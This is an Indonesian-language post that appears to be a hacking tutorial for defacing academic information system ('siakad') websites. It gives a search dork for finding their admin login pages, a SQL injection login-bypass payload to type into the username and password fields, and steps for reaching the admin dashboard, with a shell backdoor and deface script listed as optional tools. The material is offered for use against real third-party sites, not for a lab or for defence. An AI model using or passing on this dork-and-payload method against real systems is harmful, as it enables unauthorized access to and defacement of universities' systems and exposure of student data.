Asslamualaikum gaessess, welcome back :D, mimin kali ini memberikam tutor deface lagi dimana VulnerabelityNya ada di AdminLogin yang bisa kita bypass SQL di sistem aplikasi akademik (siakad). singkat saja Metodenya yaitu Siakad Vulnerabelity Bypass.
Alat Tempur :
- Dork :
Inurl:siakad intext:password intitle:LOGIN
site:
(KEMBAN6IN LAGI :D)
- Shell Backdoor (Bila Diperlukan :v)
- Sc deface (Bila Diperlukan)
- Browser & Internet
- Payload :
Username / Password
' or 1=1 limit 1 -- -+
-------------------------
Step By Step :
-------------------------
1) Dorking dlu makai dork diatas, pilih salah 1 site
2) otomatis akan dibawakan ke admin login, dan masukkan u/p nya :
' or 1=1 limit 1 -- -+
3) Jika Vuln Maka Otomatis diarahkan ke dashboard :D, Gak Ke dashboard? Gk Vuln.
Jika sudah ke dashboard admin You Know Lah Mau ngapain yekan :D
Oke Terimakasih sudah mampir
Semoga bermanfaat bagi kalangan d3facer...